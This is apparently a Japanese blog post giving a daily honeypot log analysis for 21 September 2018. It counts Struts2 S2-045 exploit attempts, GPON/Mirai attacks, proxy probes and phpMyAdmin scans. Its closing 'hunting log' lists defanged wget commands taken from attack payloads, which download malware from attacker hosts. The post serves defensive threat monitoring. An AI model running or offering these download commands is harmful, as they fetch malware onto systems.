ハニーポットのログ分析(2018/09/21)
WOWhoneypotの2018/09/21(金) (運用108日目)の簡易分析です。
本日の総アクセス件数は 77件です。
本日の気になるアクセスは以下です。
HEAD /static/admin/images/login_logo.png HTTP/1.1
Host: jf.utmtoken[.]com
少し前には「GET /js/czjl.js」でアクセスがあったのと同じホストです。不正中継の調査と考えています。
以下のアクセスはどうやら世界中のWebをスキャンするプロジェクトのようです。User-Agentに記載があるため、わかりやすいです。
HEAD /redirect.php HTTP/1.0
User-Agent: www.probethenet[.]com scanner
Content-Type: text/html
それ以外には、よく来る「Apache Struts2の脆弱性S2-045(CVE-2017-5638)を突く攻撃」がGET/POST合わせて31件来ており、件数が多いです。
以下が全アクセスログです。
件数 | 日付 | 種別 | リクエスト |
26 | 2018-09-21 | アクセス | GET / |
24 | 2018-09-21 | Apache Struts2の脆弱性S2-045(CVE-2017-5638)を突く攻撃 | GET /index.action |
8 | 2018-09-21 | GPONルータの脆弱性(CVE-2018-10561)を突くMirai亜種の攻撃 | POST /GponForm/diag_Form?images/ |
7 | 2018-09-21 | Apache Struts2の脆弱性S2-045(CVE-2017-5638)を突く攻撃 | POST /index.action |
2 | 2018-09-21 | 不正中継の調査 | GET hxxp://www.baidu.com/ |
2 | 2018-09-21 | 不正中継の調査 | CONNECT www.baidu.com:443 |
1 | 2018-09-21 | 不正中継の調査 | HEAD /static/admin/images/login_logo.png |
1 | 2018-09-21 | スキャナによる調査 | HEAD /redirect.php |
1 | 2018-09-21 | 脆弱性スキャンツールZmEuによる調査 | GET /w00tw00t.at.blackhats.romanian.anti-sec:) |
1 | 2018-09-21 | phpMyAdminの調査 | GET /pma/scripts/setup.php |
1 | 2018-09-21 | phpMyAdminの調査 | GET /phpMyAdmin/scripts/setup.php |
1 | 2018-09-21 | phpMyAdminの調査 | GET /phpmyadmin/scripts/setup.php |
1 | 2018-09-21 | phpMyAdminの調査 | GET /MyAdmin/scripts/setup.php |
1 | 2018-09-21 | phpMyAdminの調査 | GET /myadmin/scripts/setup.php |
本日のハンティングログは以下です。
件数 | 日付 | リクエスト | 種別 |
5 | 2018-09-21 | wget -c hxxp://wap.tfddos[.]net:57843/linux | Struts2 |
5 | 2018-09-21 | wget -c hxxp://222.186.138[.]8:3333/bbbiu | Struts2 |
1 | 2018-09-21 | wget -P /tmp hxxp://hfs.mhacker[.]cc:9278/Linux.server | Struts2 |
1 | 2018-09-21 | wget -c hxxp://aaa.linuxa[.]club:57843/linux | Struts2 |
1 | 2018-09-21 | wget -c hxxp://103.55.13[.]68:13333/nux | Struts2 |
以上です。